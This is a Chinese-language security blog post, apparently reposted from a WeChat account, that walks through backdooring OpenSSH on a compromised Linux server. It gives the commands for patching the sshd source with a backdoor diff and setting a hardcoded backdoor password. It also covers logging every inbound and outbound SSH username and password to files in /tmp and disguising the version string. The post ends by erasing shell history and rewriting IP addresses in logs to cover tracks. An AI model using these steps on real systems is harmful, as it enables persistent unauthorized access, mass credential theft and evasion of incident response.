[渗透思路] 利用Openssh后门 劫持root密码

admin 2023年5月29日18:55:13评论87 views字数 2425阅读8分5秒阅读模式
  1. openssh介绍

    OpenSSH是SSH(Secure Shell)协议的免费开源实现。很多人误认为OpenSSH与OpenSSL有关联,但实际上这两个计划有不同的目的和不同的发展团队,名称相近只是因为两者有同样的发展目标──提供开放源代码的加密通信软件。 
    OpenSSH是OpenBSD的子计划,其官方网站地址为http://www.openssh.com/。OpenSSH的各个版本可以到其官网下载。 

  2. 利用过程

Linux操作系统的密码较难获取。而很多Linux服务器都配置了Openssh服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号密码,甚至可以留一个隐形的后门,达到长期控制linux服务器的目的。在很多Linux系统被入侵后都会在系统中留后门,使用OpenSSH留后门是入侵者的惯用方式之一。

ssh -V 查看版本
yum -y install openssl openssl-devel pam-devel zlib zlib-devel 安装依赖

准备安装

[root@DaMoWang ~]# ssh -VOpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013[root@DaMoWang ~]# ls /opt/openssh-5.9p1.patch.tar.gz  openssh-5.9p1.tar.gz# openssh-5.9p1.patch 是补丁文件

解压

[root@DaMoWang ~]# cd /opt/[root@DaMoWang opt]# tar xf openssh-5.9p1.tar.gz [root@DaMoWang opt]# tar xf openssh-5.9p1.patch.tar.gz [root@DaMoWang opt]# lsopenssh-5.9p1  openssh-5.9p1.patch  openssh-5.9p1.patch.tar.gz  openssh-5.9p1.tar.gz

给openssh打补丁

[root@DaMoWang opt]# cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1[root@DaMoWang opt]# which patch/usr/bin/which: no patch in (/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin)[root@DaMoWang opt]# yum install patch[root@DaMoWang opt]# cd /opt/openssh-5.9p1[root@DaMoWang openssh-5.9p1]# patch < sshbd5.9p1.diff   # 打补丁就是修改替换原文件patching file auth.cpatching file auth-pam.cpatching file auth-passwd.cpatching file canohost.cpatching file includes.hpatching file log.cpatching file servconf.cpatching file sshconnect2.cpatching file sshlogin.cpatching file version.h


添加后门密码

[root@DaMoWang openssh-5.9p1]# vim includes.h # 跳转到配置文件末尾处 , 修改默认配置#define ILOG "/tmp/ilog"    # 记录远程登录本机的用户和密码#define OLOG "/tmp/olog"    # 记录本机远程登录到其他主机的用户和密码#define SECRETPW "apaajaboleh"    # 后门密码

[渗透思路] 利用Openssh后门 劫持root密码

修改版本号

[root@DaMoWang openssh-5.9p1]# vim version.h # 修改为当前OpenSSH的版本号#define SSH_VERSION     "OpenSSH_5.3"
#define SSH_PORTABLE "p1"

编译安装

[root@DaMoWang openssh-5.9p1]# ./configure --prefix=/usr  --sysconfdir=/etc/ssh  --with-pam  --with-kerberos5  && make && make install

重启ssh服务 测试一下

[root@DaMoWang openssh-5.9p1]# service sshd restart停止 sshd[确定]正在启动 sshd[确定][root@DaMoWang openssh-5.9p1]# ssh -VOpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 201

服务正常启动 , 版本也与原版本一致

测试是否能劫持用户密码

首先测试远程登录本机

现在并没有生成文件

用xshell远程连接一下

[渗透思路] 利用Openssh后门 劫持root密码

用户名和密码被劫持 , 不仅仅是root用户  , 所有远程连接本机的用户都会被记录

[渗透思路] 利用Openssh后门 劫持root密码

测试后面密码能否登录本机

为了看到效果 使用明文密码登录

[渗透思路] 利用Openssh后门 劫持root密码

连接以后 别留下脚印

[root@DaMoWang ~]# export HISTFILE=/dev/null[root@DaMoWang ~]# export HISTSIZE=0[root@DaMoWang ~]# export HISTFILESIZE=0[root@DaMoWang ~]# echo >/root/.bash_history # 这个是历史命令的终极文件 不能删除 , 如果原来有内容 , 不能清除 可以是用sed替换[root@DaMoWang ~]# sed -i ‘s/192.168.94.66/127.0.0.1/g’ /root/.bash_history# 其他访问日志也可以用用sed替换ip , 瞒天过海



原文始发于微信公众号(Pik安全实验室):[渗透思路] 利用Openssh后门 劫持root密码

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月29日18:55:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [渗透思路] 利用Openssh后门 劫持root密码https://cn-sec.com/archives/1763395.html

发表评论

匿名网友 填写信息